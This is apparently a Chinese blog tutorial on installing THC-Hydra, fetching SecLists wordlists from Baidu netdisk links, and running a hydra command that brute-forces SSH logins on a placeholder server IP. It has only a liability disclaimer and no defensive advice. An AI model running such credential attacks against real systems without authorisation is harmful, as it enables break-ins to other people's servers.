网络安全-安全测试-Hydra暴力破解服务器密码（仅学习讨论）

网络安全-安全测试-Hydra暴力破解服务器密码（仅学习讨论）

一、Hydra工具下载

官网网址

或者

通过网盘分享的文件：thc-hydra-9.5.tar.gz
链接: https://pan.baidu.com/s/1YMYLL4LQ35i0bxHPvWw1nQ?pwd=sky1 提取码: sky1

二、安装Hydra

2.1、安装相关依赖

sudo yum install -y gcc make openssl-devel libssh-devel libidn-devel pcre-devel gtk2-devel mysql-devel postgresql-devel subversion-devel firebird-devel libmemcached-devel libgpg-error-devel libgcrypt-devel

2.2、解压文件

tar -zxvf thc-hydra-9.5.tar.gz

2.3、编译

./configure make sudo make install 

如果OpenSSL冲突导致make操作报错（不报错忽略此步骤）

make clean
# 强制使用 OpenSSL 1.1 并指定路径
export LDFLAGS="-L/usr/lib64 -lssl -lcrypto"
export CFLAGS="-I/usr/include/openssl"

# 运行 configure（启用必要模块）
./configure --with-openssl=/usr

make

2.4、安装Hydra服务

sudo make install

三、验证安装

hydra -h

安装成功 如图所示：

四、安装用户字典 和 密码字典

官网下载

或者

通过网盘分享的文件：SecLists-master.zip
链接: https://pan.baidu.com/s/1-dm3u8rm6EsAbTU0j-zviQ?pwd=sky1 提取码: sky1

五、暴力破解服务器密码

hydra -L SecLists-master/Usernames/top-usernames-shortlist.txt \
	  -P SecLists-master/Passwords/Common-Credentials/xato-net-10-million-passwords-1000.txt \
	  ssh://<服务器的IP地址> \
	  -t 4 -vV -o ssh_results.txt

特别声明：

此博客为纯技术分享！目的决不是为那些怀有不良动机的人提供及技术支持！也不承担因为技术被滥用所产生的连带责任！在于最大限度地唤醒大家对网络安全的重视，并采取相应的安全措施，从而减少由网络安全而带来的经济损失！！！